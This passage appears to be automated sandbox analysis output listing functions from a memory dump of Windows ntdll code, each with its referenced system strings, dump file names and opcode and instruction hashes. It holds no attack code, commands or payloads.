                                                          • Opcode ID: 43d0e6b73bd2907e7da0a5ed427a3a4e39834f7e6f8e99b078f93aedf3141705
                                                          • Instruction ID: dfbb67601421f03b74d3015a71d656eb889410e9f45908ada545defc1477eb64
                                                          • Opcode Fuzzy Hash: 43d0e6b73bd2907e7da0a5ed427a3a4e39834f7e6f8e99b078f93aedf3141705
                                                          • Instruction Fuzzy Hash: 8391D0B5A09709CFEB21CF54D840BAE77F6FF04364F148199E855AB294D7B8DA80CB90
                                                          Function 3595909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$&$@
                                                          • API String ID: 0-1537733988
                                                          • Opcode ID: 0cf6b1ff0aba6b1046aeab2b41e6fbdf35cd66b9f2b9bcc8b274f220f87c3624
                                                          • Instruction ID: c5924b10c9b6bf900a6a54a620e9ebb70033cee497d4973de1d4dc4f0350b2d2
                                                          • Opcode Fuzzy Hash: 0cf6b1ff0aba6b1046aeab2b41e6fbdf35cd66b9f2b9bcc8b274f220f87c3624
                                                          • Instruction Fuzzy Hash: F671BE746093019FE714CF20C980A5BBBFEFF89668F508D1DE49A87291DB31E915CB92
                                                          Function 359FB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • GlobalizationUserSettings, xrefs: 359FB834
                                                          • TargetNtPath, xrefs: 359FB82F
                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 359FB82A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                          • API String ID: 0-505981995
                                                          • Opcode ID: 9d1225d339c197a8876d588391f5e38300b6d1f0d0f6311da16bf6b8467e3ae5
                                                          • Instruction ID: 346ff60b9d34a86e280657abac873aead1bd9e4235003a3d82435758946c7c77
                                                          • Opcode Fuzzy Hash: 9d1225d339c197a8876d588391f5e38300b6d1f0d0f6311da16bf6b8467e3ae5
                                                          • Instruction Fuzzy Hash: 41618D72A4122DABDB21DF54DC88BDAB7B9BF08755F4101E5E908A7250CB35EE84CF90
                                                          Function 3591F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3597E6C6
                                                          • HEAP[%wZ]: , xrefs: 3597E6A6
                                                          • HEAP: , xrefs: 3597E6B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                          • API String ID: 0-1340214556
                                                          • Opcode ID: c165fc5e846968a4d5aa57e3d974e0180d1ecd02c228e8d19ba03bcd66fd77e6
                                                          • Instruction ID: 71bf72e3dbb1d6c28283190648256c209bd258f9fe79880a6d58471b30a4997c
                                                          • Opcode Fuzzy Hash: c165fc5e846968a4d5aa57e3d974e0180d1ecd02c228e8d19ba03bcd66fd77e6
                                                          • Instruction Fuzzy Hash: 0551F675604B58EFE312CB64C845F9ABBF9FF05344F0440A5E9428B693DB78EA40CB20
                                                          Function 359415F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpCompleteMapModule, xrefs: 3598A590
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3598A589
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3598A59A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          • Opcode ID: 0509b44e89950cbf40d8d7c48efbd70374688c7641e6d8c2b5a4e7fd32f8e8fb
                                                          • Instruction ID: 1f6d2c5b2f8bdad2fb5b910641b39fced739bd373a52de4e8881ead6c034e8df
                                                          • Opcode Fuzzy Hash: 0509b44e89950cbf40d8d7c48efbd70374688c7641e6d8c2b5a4e7fd32f8e8fb
                                                          • Instruction Fuzzy Hash: 035152B8704784DBE722CB1AC984B0A77F9FF00764F0802A9E9519B6E2DB74ED40CB40
                                                          Function 3591758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                          • API String ID: 0-1151232445
                                                          • Opcode ID: 463b1ee5b278975235badf5b921968a65e835511f334f7e4fe0f6cd7a105862b
                                                          • Instruction ID: 6122f0c215827d47586a98aa936522354154297df83801d88ba9986fae7f7fa5
                                                          • Opcode Fuzzy Hash: 463b1ee5b278975235badf5b921968a65e835511f334f7e4fe0f6cd7a105862b
                                                          • Instruction Fuzzy Hash: 144179B93043558FEB25CB1CC880B6977E5BF053D4F5440AADC568B242DB72DA86CB12
                                                          Function 359516CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 35991B4A
                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35991B39
                                                          • LdrpAllocateTls, xrefs: 35991B40
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-4274184382
                                                          • Opcode ID: 94820b7001e6cd39bdd301457552587ef511eba92085b97c90546ae679d392bd
                                                          • Instruction ID: acc8df62986a2e30a4aabd6cfda6ab81215815c120dd819cca079e6d001712b0
                                                          • Opcode Fuzzy Hash: 94820b7001e6cd39bdd301457552587ef511eba92085b97c90546ae679d392bd
                                                          • Instruction Fuzzy Hash: AE41AAB5A01749EFDB15CFA8C840BAEBBF6FF48314F148519E405A7211DB74A901EF90
                                                          Function 359D5180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-964947082
                                                          • Opcode ID: 302f97cb3e2c51a9bb23d7a6c37cf673230a0af9b74b9bc24bbfdecee309b91b
                                                          • Instruction ID: 03cb249a4095a7998fe3ce878e2f9d08dff2dcf85af8914b2bda703a51e0a9f2
                                                          • Opcode Fuzzy Hash: 302f97cb3e2c51a9bb23d7a6c37cf673230a0af9b74b9bc24bbfdecee309b91b
                                                          • Instruction Fuzzy Hash: 0E4106B5615358DFD710CF58D880F6ABBF9FF08394F01C05AEA069B241CA30DA49DBA0
                                                          Function 359533A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Actx , xrefs: 359533AC
                                                          • RtlCreateActivationContext, xrefs: 359929F9
                                                          • SXS: %s() passed the empty activation context data, xrefs: 359929FE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                          • API String ID: 0-859632880
                                                          • Opcode ID: aa36b0624f4186cb6cabe7b6a1a5689b90911b28f2e10e6512ceaba2de339852
                                                          • Instruction ID: cd16a356117ece585d9ae5a0af3ac4b2c33530d67ec0c6a6073be2c9dbb4b658
                                                          • Opcode Fuzzy Hash: aa36b0624f4186cb6cabe7b6a1a5689b90911b28f2e10e6512ceaba2de339852
                                                          • Instruction Fuzzy Hash: 033101736113059FEB16CE69D880B9A37A9FB48720F518869ED059F282CB70E855CB90
                                                          Function 359AB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 359AB632
                                                          • @, xrefs: 359AB670
                                                          • GlobalFlag, xrefs: 359AB68F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                          • API String ID: 0-4192008846
                                                          • Opcode ID: 8090fe15918dd8e1831d60ac56e49dfb2cb3eab7e8643490997c1c1292500853
                                                          • Instruction ID: 00251aa4f3b693532fdadf3dd0304110acbf3e1bfb933f72e38a96a56cf0c09e
                                                          • Opcode Fuzzy Hash: 8090fe15918dd8e1831d60ac56e49dfb2cb3eab7e8643490997c1c1292500853
                                                          • Instruction Fuzzy Hash: AC315AB6E00219AFDB01DFA4DC80AEEBBBDEF44754F500469EA05A7151D774AA04CBA4
                                                          Function 359C13B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                          • API String ID: 0-1050206962
                                                          • Opcode ID: 6c25ff32682aec05d605e195772155f472eb19d6f0c96043971f133965661d88
                                                          • Instruction ID: 5d7daf9a325616b80050db371700b21a71f5660508ed369d21efdae882a1367a
                                                          • Opcode Fuzzy Hash: 6c25ff32682aec05d605e195772155f472eb19d6f0c96043971f133965661d88
                                                          • Instruction Fuzzy Hash: 8D318E72E00659BFDB12DF94CC84EAEBBBDEB44754F4144E5EA00A7211D738DD089BA1
                                                          Function 35951607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializeTls, xrefs: 35991A47
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 35991A51
                                                          • DLL "%wZ" has TLS information at %p, xrefs: 35991A40
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-931879808
                                                          • Opcode ID: 12a2c387cc3ebfa46861d8f815f4df91a8b6804083b21ea7f600f6674f8f3509
                                                          • Instruction ID: ec3f9edbc519d4b120071a45b5c7ecfcac73870188feeea888a295e1c1d6dd54
                                                          • Opcode Fuzzy Hash: 12a2c387cc3ebfa46861d8f815f4df91a8b6804083b21ea7f600f6674f8f3509
                                                          • Instruction Fuzzy Hash: 7031F871A12341ABEB14CF48C845F9A737DFB483A4F050959E940B7290DB70BE56ABA0
                                                          Function 359174B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: RtlValidateHeap
                                                          • API String ID: 3446177414-1797218451
                                                          • Opcode ID: c099ca8de017913150ecbe840bdf9f1eedbffe75b789a84d6ef52e9b1ee038cc
                                                          • Instruction ID: 3484667fc32c051df038a732c330ef66ef0a0fcd13f2dc4ddc391ecd1d7b6a6a
                                                          • Opcode Fuzzy Hash: c099ca8de017913150ecbe840bdf9f1eedbffe75b789a84d6ef52e9b1ee038cc
                                                          • Instruction Fuzzy Hash: 66412C76B0535ADFDB02CF64C8907ADBBB6BF45350F04825ADC5257281CB35AA01DBD0
                                                          Function 359C705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: kLsE
                                                          • API String ID: 3446177414-3058123920
                                                          • Opcode ID: e466920747e8475eed49b3f1a5836855926898062f84291fa98dedbbaccfe041
                                                          • Instruction ID: 1541b5973ed5d642b37f5ba817cf70805f73d3d74476bd21932b31f63baa4fef
                                                          • Opcode Fuzzy Hash: e466920747e8475eed49b3f1a5836855926898062f84291fa98dedbbaccfe041
                                                          • Instruction Fuzzy Hash: AB4126B16253514BE711DB68ED84B6D3BA8B704764F11019DEC62AB0C2CF641683D7E2
                                                          Function 359352A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@
                                                          • API String ID: 0-149943524
                                                          • Opcode ID: 0f90a6d90085615ca649d1ba4eadd9f5732b7e1ca5c145c90b25c5aa6b9b342f
                                                          • Instruction ID: f752f9c4016d84303bf264f555952dbd483b7e5baed5e200341c6c61fb37a86e
                                                          • Opcode Fuzzy Hash: 0f90a6d90085615ca649d1ba4eadd9f5732b7e1ca5c145c90b25c5aa6b9b342f
                                                          • Instruction Fuzzy Hash: 323279B8609351CBD725CF14C481B2AB7FAFF88744F50492EE9869B2A0E774D944CB92
                                                          Function 35925702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 16249c75911a06a50747434db926282e060b82206a1345d5c93a8b9771906d45
                                                          • Instruction ID: 490a5b6598b91765aaad39b30e034b123eec0d4b8dacacb828587c2fcac81473
                                                          • Opcode Fuzzy Hash: 16249c75911a06a50747434db926282e060b82206a1345d5c93a8b9771906d45
                                                          • Instruction Fuzzy Hash: 5B31CB35341B0AEFE755CB24CA80E8ABBBABF48344F040025E9059BA55DBB4F821CBD0
                                                          Function 3593F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$
                                                          • API String ID: 3446177414-233714265
                                                          • Opcode ID: aa54ddad9e6abcaf57ea47f7f7cda0df84973e0834861753b7ff3f409e9bd28b
                                                          • Instruction ID: cbae04b0290cf52295887b5e812b498ab27b6fa21303c5654cd5f2fddbdbc52b
                                                          • Opcode Fuzzy Hash: aa54ddad9e6abcaf57ea47f7f7cda0df84973e0834861753b7ff3f409e9bd28b
                                                          • Instruction Fuzzy Hash: 6461DD75A06749DFEB20CFA4C582B9DBBB6FF48304F104069D51AAB641DB7CB985CB80
                                                          Function 359B35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                          • API String ID: 0-118005554
                                                          • Opcode ID: 9b76c719f12643daad5b2c0502bd847e0292e6814b4f22e9a09f2c7d363c2a53
                                                          • Instruction ID: c6dae83a5de16e3391ebb2435bbddcf4668cc7ac20d6dc80ea03d5fe4f705f78
                                                          • Opcode Fuzzy Hash: 9b76c719f12643daad5b2c0502bd847e0292e6814b4f22e9a09f2c7d363c2a53
                                                          • Instruction Fuzzy Hash: 5A31ED76209741DBE701CB69E846B1AB3E8FF8D750F040869F854CB391EBB4E905CB92
                                                          Function 3595329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local\$@
                                                          • API String ID: 0-380025441
                                                          • Opcode ID: 6621fbe5e49e913c2e46b3977ff1981f44375e8915fe1c9b91fb7eec3d80dd60
                                                          • Instruction ID: c9ec07966049b3d0b687512856c79b96d63322cf11cf0ebe4dc7ec7f9d3231a9
                                                          • Opcode Fuzzy Hash: 6621fbe5e49e913c2e46b3977ff1981f44375e8915fe1c9b91fb7eec3d80dd60
                                                          • Instruction Fuzzy Hash: 7031A476509304DFD311CF28C580A5BBBF8FB896A4F80092EF99487210DB34DD18CB92
                                                          Function 359534B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 35992A95
                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 35992A90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                          • API String ID: 0-2653619699
                                                          • Opcode ID: c6829518e11877850c367eca5c226465c96b93e242cc3f5cf9f4fe1c70266eb4
                                                          • Instruction ID: 3a62ab8090f6b6c11491f3e1018ccb0db74679789728a66b37dba807d2835365
                                                          • Opcode Fuzzy Hash: c6829518e11877850c367eca5c226465c96b93e242cc3f5cf9f4fe1c70266eb4
                                                          • Instruction Fuzzy Hash: E2112C76B05204FBFB26CF488D41F9F77ADAB88B64F1584697904DB280D674DD0086A0
                                                          Function 359F31E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 359F3356
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8
                                                          • String ID:
                                                          • API String ID: 4062629308-0
                                                          • Opcode ID: d308c7d170b379523f29a01ada1946bdb5473573d6948e0f41734667f78e9123
                                                          • Instruction ID: 5c8582a0ef2f325d297dab3593ee09de9ef76f8c83184a68dde71b4f1b26e3f9
                                                          • Opcode Fuzzy Hash: d308c7d170b379523f29a01ada1946bdb5473573d6948e0f41734667f78e9123
                                                          • Instruction Fuzzy Hash: 90C124B99017198FDB20CF1AC884699FBF5FF88315F5081AED54EA7250D779AA81CF40
                                                          Function 35921131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
